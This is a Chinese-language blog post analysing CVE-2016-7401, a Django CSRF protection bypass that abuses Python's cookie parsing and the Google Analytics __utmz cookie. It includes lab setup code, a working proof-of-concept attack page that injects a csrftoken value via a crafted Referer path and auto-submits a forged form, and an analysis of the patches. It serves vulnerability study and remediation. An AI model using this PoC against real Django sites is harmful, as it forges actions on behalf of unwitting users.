Django CSRF Bypass 漏洞分析(CVE-2016-7401)

最新推荐文章于 2024-09-20 14:49:33 发布
最新推荐文章于 2024-09-20 14:49:33 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: # Python代码审计

0x00 漏洞概述

1.漏洞简介

Django是一个由Python写成的开源Web应用框架。在两年前有研究人员在hackerone上提交了一个利用Google Analytics来绕过Django的CSRF防护机制的漏洞(CSRF protection bypass on any Django powered site via Google Analytics),通过该漏洞,当一个网站使用了Django作为Web框架并且设置了Django的CSRF防护机制,同时又使用了Google Analytics的时候,攻击者可以构造请求来对CSRF防护机制进行绕过。

2.漏洞影响

网站满足以下三个条件的情况下攻击者可以绕过Django的CSRF防护机制:

  • 使用Google Analytics来做数据统计
  • 使用Django作为Web框架
  • 使用基于Cookie的CSRF防护机制(Cookie中的某个值和请求中的某个值必须相等)

3.影响版本

  • Django 1.9.x < 1.9.10
  • Django 1.8.x < 1.8.15
  • Python2 < 2.7.9
  • Python3 < 3.2.7

0x01 漏洞复现

1. 环境搭建

pip install django==1.9.9  
django-admin startproject project  
cd project  
python manage.py startapp app  
cd app  
将 'app' 添加到 project/project/settings.py 中的 INSTALLDE_APPS 列表中更改或添加下列文件:

project/app/views.py:

from django.shortcuts import render  
from django.http import HttpResponse

# Create your views here.

def check(req):  
    if req.method == 'POST':
        return HttpResponse('CSRF check successfully!')
    else:
        return render(req, 'check.html')

def ga(req):  
    return render(req, 'ga.html')

project/project/urls.py:

from django.conf.urls import url  
from django.contrib import admin

from app.views import check, ga

urlpatterns = [  
    url(r'^admin/', admin.site.urls),
    url(r'^check/', check, name='check'),
    url(r'^ga/', ga, name='ga'),
]

project/app/templates/check.html:

<form action="/check/" method="POST">  
    {% csrf_token %}
    <input type="submit" value="Check"></input>
</form>

project/app/templates/ga.html(放置Goolge Analytics脚本的页面):

<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-XXXXX-X']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>

最后运行开启Django内置server:

# project/
python manage.py runserver

2.漏洞分析

我们先来看这样一个场景:

当python内置的Cookie.SimpleCookie()解析a=hello]b=world这种形式的字符串时会以]作为分隔,最后取得a=hellob=world这两个cookie,那么为什么会这样呢?

我们看一下源码,Ubuntu下/usr/lib/python2.7/Cookie.py第622-663行:

def load(self, rawdata):  
    """Load cookies from a string (presumably HTTP_COOKIE) or
    from a dictionary.  Loading cookies from a dictionary 'd'
    is equivalent to calling:
        map(Cookie.__setitem__, d.keys(), d.values())
    """
    if type(rawdata) == type(""):
        self.__ParseString(rawdata)
    else:
        # self.update() wouldn't call our custom __setitem__
        for k, v in rawdata.items():
            self[k] = v
    return
# end load()

def __ParseString(self, str, patt=_CookiePattern):  
    i = 0            # Our starting point
    n = len(str)     # Length of string
    M = None         # current morsel

    while 0 <= i < n:
        # Start looking for a cookie
        match = patt.search(str, i)
        if not match: break          # No more cookies

        K,V = match.group("key"), match.group("val")
        i = match.end(0)

        ...

当传入load一个字符串时,调用__ParseString,在__ParseString中有这样一句:match = patt.search(str, i),根据之前定义的pattern来查找字符串中符合pattern的cookie,_CookiePattern在529-545行:

_LegalCharsPatt  = r"[\w\d!#%&'~_`><@,:/\$\*\+\-\.\^\|\)\(\?\}\{\=]"  
_CookiePattern = re.compile(  
    r"(?x)"                       # This is a Verbose pattern
    r"(?P<key>"                   # Start of group 'key'
    ""+ _LegalCharsPatt +"+?"     # Any word of at least one letter, nongreedy
    r")"                          # End of group 'key'
    r"\s*=\s*"                    # Equal Sign
    r"(?P<val>"                   # Start of group 'val'
    r'"(?:[^\\"]|\\.)*"'            # Any doublequoted string
    r"|"                            # or
    r"\w{3},\s[\s\w\d-]{9,11}\s[\d:]{8}\sGMT" # Special case for "expires" attr
    r"|"                            # or
    ""+ _LegalCharsPatt +"*"        # Any word or empty string
    r")"                          # End of group 'val'
    r"\s*;?"                      # Probably ending in a semi-colon
    )

在这里我们看到]并没有在_LegalCharsPatt中,由于代码中使用的是search函数,所以在匹配a=hello后碰到]会跳过这个字符然后再匹配b=world。因此正是因为使用search函数来匹配,所以当a=hello后面是任意一个不在_LegalCharsPatt中的字符(例如[\]\x09\x0b\x0c)都会达到同样的效果:

c.load('a=helloXb=world') # X为上述字符  
SetCookie: a='hello' b='world'

这个漏洞也正是整个Bypass的核心所在。
我们再来看Django(1.9.9)中对cookie的解析,在http/cookie.py 中第91-106行:

def parse_cookie(cookie):  
    if cookie == '':
        return {}
    if not isinstance(cookie, http_cookies.BaseCookie):
        try:
            c = SimpleCookie()
            c.load(cookie)
        except http_cookies.CookieError:
            # Invalid cookie
            return {}
    else:
        c = cookie
    cookiedict = {}
    for key in c.keys():
        cookiedict[key] = c.get(key).value
    return cookiedict

根据动态调试发现这里的SimpleCookie也就是我们上面所说的存在漏洞的对象,从而可以确定Django中对cookie的处理也是存在漏洞的。

我们再来看看Django的CSRF防护机制,默认CSRF防护中间件是开启的,我们访问http://127.0.0.1:8000/check/,点击Check然后抓包:

可以看到csrftokencsrfmiddlewaretoken的值是相同的,其中csrfmiddlewaretoken的值如图:

也就是Django对check.html中的{% csrf_token %}所赋的值。我们再改下包,使csrftokencsrfmiddlewaretoken不相等,这回服务器就会返回403:

我们再把两个值都改成另外一个值看看:

依然成功。

所以Django对于CSRF的防护就是判断cookie中的csrftoken和提交的csrfmiddlewaretoken的值是否相等。

那么如果想Bypass这个防护机制,就是要想办法设置受害者的cookie中的csrftoken值为攻击者构造的csrdmiddlewaretoken的值。

如何设置受害者cookie呢?Google Analytics帮了我们这个忙,它为了追踪用户,会在用户浏览时添加如下cookie:

__utmz=123456.123456789.11.2.utmcsr=[HOST]|utmccn=(referral)|utmcmd=referral|utmcct=[PATH]

其中[HOST][PATH]是由Referer确定的,也就是说当Referer: http://x.com/helloworld时,cookie如下:

__utmz=123456.123456789.11.2.utmcsr=x.com|utmccn=(referral)|utmcmd=referral|utmcct=helloworld

由于Referer是我们可以控制的,所以也就有了设置受害者cookie的可能,但是如何设置csrftoken的值呢?

这就用到了我们上面说的Django处理cookie的漏洞,当我们设置Referer为http://x.com/hello]csrftoken=world,GA设置的cookie如下:

__utmz=123456.123456789.11.2.utmcsr=x.com|utmccn=(referral)|utmcmd=referral|utmcct=hello]csrftoken=world

当Django解析cookie时就会触发上面说的漏洞,将cookie中csrftoken的值赋为world。

实际操作一下,为了方便路由我们在另一个IP上再开一个DjangoApp作为中转,其中各文件如下:

urls.py:

from django.conf.urls import url  
from django.contrib import admin

from app.views import route

urlpatterns = [  
    url(r'^admin/', admin.site.urls),
    url(r'^hello', route)
]

views.py:

from django.shortcuts import render  
from django.http import HttpResponse

# Create your views here.

def route(req):  
    return render(req, 'route.html')

route.html:

<script> window.location = 'http://127.0.0.1:8000/ga/'; </script>

开启中转App:

python manage.py runserver xxx

构造一个攻击页面:

<form id="csrf" action="http://127.0.0.1:8000/check/" method="POST">  
    <input type="hidden" name="csrfmiddlewaretoken" value="boom">
</form>

<script type="text/javascript" charset="utf-8">  
function sleep (time) {  
      return new Promise((resolve) => setTimeout(resolve, time));
}

function poc() {  
    window.open('http://redirect-server/hello]csrftoken=boom');

    sleep(1000).then(() => {
        document.getElementById('csrf').submit();
    });
}
</script>

<a href='#' onclick=poc()> Click me </a>

当我们点击Click me,会先打开一个窗口,再回到原窗口,就可以看到保护机制已经绕过:

再访问一下http://127.0.0.1:8000/check/,可以看到此时cookie中的csrftoken和form中的csrfmiddlewaretoken都已被设置成boom,证明漏洞成功触发:

攻击流程如下:

3.补丁分析

Python

可以看到这个漏洞在根本上是原生Python的漏洞,首先看最早在2.7.9中的patch:

search改成了match函数,所以再遇到非法符号匹配会停止。

再看该文件在2.7.10中的patch:

这里将[\]设置为了合法的value中的字符,也就是

>>> C.load('__utmz=blah]csrftoken=x')
>>> C
<SimpleCookie: __utmz='blah]csrftoken=x'>

同样Python3在3.2.7和3.3.6中也做了相应patch:

不过尽管上面对[\]做了限制,但是由于pattern最后\s*的存在,所以在以下情况下仍然存在漏洞:

>>> import Cookie
>>> C = Cookie.SimpleCookie()
>>> C.load('__utmz=blah csrftoken=x')
>>> C.load('__utmz=blah\x09csrftoken=x')
>>> C.load('__utmz=blah\x0bcsrftoken=x')
>>> C.load('__utmz=blah\x0ccsrftoken=x')
>>> C
<SimpleCookie: __utmz='blah' csrftoken='x'>

这些情况在最新的Python中并没有被修复,不过在实际情况中由于浏览器和脚本的原因,这些字符不一定会保存原样发送给Python处理,所以在利用上还要根据场景来分析。

Django

Django在1.9.10和1.8.15中做了相同的patch:

它放弃了使用Python内置库来处理cookie,而是自己根据;分割再取值,使特殊符号不再起作用。

0x02 修复方案

  • 升级Python
  • 升级Django

0x03 参考

原文:http://blog.knownsec.com/2016/10/django-csrf-bypass_cve-2016-7401/

FLy_鹏程万里
关注
专栏目录
漏洞复现】Django SQL注入漏洞 (CVE-2022-28346)
做自己喜欢的事,并将其发挥到极致!
01-01 4887
Django是用Python开发的一个免费开源的Web结构,几乎包括了Web使用方方面面,能够用于快速建立高性能、文雅的网站,Diango提供了许多网站后台开发常常用到的模块,使开发者可以专注于业务部分。攻击者使用精心编制的字典,通过 **kwargs 传递给QuerySet.annotate()、aggregate()和extra()这些方法,可导致这些方法在列别名中受到SQL注入攻击,该漏洞在2.2.28之前的Django 2.2、3.2.13之前的3.2和4.0.4之前的4.0中都存在这个问题。
[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042
qq_51577576的博客
09-28 2704
[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。
Django任意URL跳转漏洞CVE-2018-14574)
jammny
01-25 2098
前言 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身 Voulhub靶机平台环境搭建和使用: https://blog.csdn.net/qq_41832837/article/details/103948358 目录: 漏洞原理 漏洞详情 漏洞复现 ...
Django -CSRF漏洞
二进制杯莫停的博客
02-08 610
    跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 1 CSR...
Django SQL注入-漏洞分析
最新发布
徐徐徐的博客
09-20 275
4.对接口参数进行fuzz(实战思路),vulfocus已经给出了/demo?5.对接口进行SQL注入测试(单引号,双引号等),发现双引号报错,页面直接返回了flag。2.访问任意不存在的目录路径报错,提示存在demo接口。或者下载github项目,使用python安装。3.访问/demo/,提示有一个name参数。然后我们输入单个url进行扫描。图4 cmd进入工具路径。图9 页面返回flag。先下载项目arjun。图5 安装arjun。图10 flag找寻。
Bypass Preventing CSRF
tenfyguo的技术专栏
11-24 1260
<br />from : http://superhei.blogbus.com/logs/13463505.html<br /> <br />CSRF在过去的n年(n>2)一直都火,在bh/defcon/owasp等会议上多次探讨CSRF的攻防[具体你可以看看以往的那些pp].前段时间PLAYHACK.net上发表了一个总结性的pp:Preventing CSRF,然而CSRF是很难彻底防止的,这个也是我说CSRF卑鄙无耻的一个原因,下面我的一些Bypass Preventing CSRF的tips:<b
Django URL跳转漏洞CVE-2018-14574 )
weixin_50217210的博客
11-01 254
Django默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中。即在path开头为//baidu.com的情况下,Django没做处理,导致浏览器认为目的地址是绝对路径,最终造成任意URL跳转漏洞。对那些末尾没加/的url自动填补/然后重新发起请求 所以如果在末尾加上了/是不会跳转成功的。3.只要在url后加上//想跳转的网页,即可实现跳转。命令:docker-compose up -d。复现环境:vulhub。
Django SQL注入漏洞CVE-2020-7471)复现
玄道的网安博客
08-01 2847
简介 Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义并注入恶意SQL语句。 影响版本 Django 1.11.x < 1.11.28 Django 2.2.x < 2.2.10 Django 3.0.x < 3.0.3 Django 主开发分支 环境搭建 ..
[ vulhub漏洞复现篇 ] Django debug page XSS漏洞 CVE-2017-12794
qq_51577576的博客
09-29 1881
[ vulhub漏洞复现篇 ] Django debug page XSS漏洞 CVE-2017-12794 DjangoDjango软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。
Django SQL注入漏洞复现(CVE-2021-35042)
又菜又爱倒腾的博客
10-29 6987
#Django SQL注入漏洞(CVE-2021-35042)# 一、漏洞简介 Django是一个开放源代码的Web应用框架,由Python写成。采用了MVC的框架模式,即模型M,视图V和控制器C。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的,即是CMS(内容管理系统)软件。 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器
Django SQL注入漏洞复现(CVE-2021-35042)
xiaobai_20190815的博客
04-08 6591
一、漏洞介绍 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。利用方式:1、用户认证:不需要用户认证 2、触发方式:远程,属于高危漏洞。 二、影响版本 Django 3.2 Django 3.1 三、源码分析 在add_ordering()函数中,进行如下了五个判断:字段中是否带点、字段是否为问号、字段开头是否
Django debug page XSS漏洞CVE-2017-12794)分析
mmdlm的博客
08-17 523
基本介绍Django 是一个由 Python 编写的一个开放源代码的 Web 应用框架。使用 Django,只要很少的代码,Python 的程序开发人员就可以轻松地完成一个正式网站所需要的大部分内容,并进一步开发出全功能的 Web 服务 Django 本身基于 MVC 模型,即 Model(模型)+ View(视图)+ Controller(控制器)设计模式,MVC 模式使后续对程序的修改和扩展简化,并且使程序某一部分的重复利用成为可能Django详情参考菜鸟教程。...
Django SQL注入漏洞
RhxrhxrR的博客
05-13 350
1.访问http://110.40.154.100:8000,可以看到Django的默认页面 2.访问http://110.40.154.100:8000/admin进入登录界面 输入账号密码进行登录 3.进入Collection的管理页面http://110.40.154.100:8000/admin/vuln/collection/ 4.GET参数中构造detail__a'b=123提交,其中detail是模型Collection中的JSONFie...
Django开发框架多个安全漏洞
Yatere的天平秤
10-30 1312
影响版本: Django 1.2.5 Django 1.3 beta 1 Django 1.2.4 Django 1.2.2 Django 1.2 漏洞描述: Django是一款开放源代码的Web应用框架,由Python写成。 Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。 1)当使用缓存后端时django.contr
django version 2.1漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-21 355
django version 2.1漏洞,SQL注入漏洞CVE-2020-7471,CVE-2021-35042 CVE-2021-35042 Django SQL注入漏洞,StringAgg(分隔符)实现利用的潜在 sql注入。 django version 2.1漏洞内容概述:攻击者可通过构造分隔符传递给聚合函数。contrib.postgres.aggregates.StringAgg,从而绕过转义符号(\)并注入恶意SQL语句。 django version 2.1漏洞影响版本:1.11,2.2,3
漏洞深度分析 | CVE-2023-36053-Django 表达式拒绝服务
LJQClqjc的博客
07-10 1357
当这个输入被URLValidator处理时,由于正则表达式的处理时间与输入的长度呈指数关系,所以可能会导致处理时间过长实现导致服务拒绝。它由经验丰富的开发人员构建,解决了 Web 开发的大部分麻烦,因此您可以专注于编写应用程序,而无需重新发明轮子。这是因为正则表达式的处理时间与输入的长度呈指数关系,如果输入的长度非常大会导致处理时间过长,实现DoS。在URLValidator中,增加了一个max_length属性,其值为2048,用于限制URL的最大长度。如果URL的长度超过这个值,将会抛出一个验证错误。
Python 开发 框架安全:Django SQL注入漏洞测试.(CVE-2021-35042)
网络安全领域___专研者.
05-08 1341
Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来,使得开发人员可以更加专注于应用程序的不同方面。
Django SQL注入漏洞分析CVE-2022-28346)
蚁景网安学院
05-11 1353
Django 在2022年发布的安全更新,修复了在 QuerySet 的 annotate(), aggregate(), extra() 等函数中存在的 SQL 注入漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值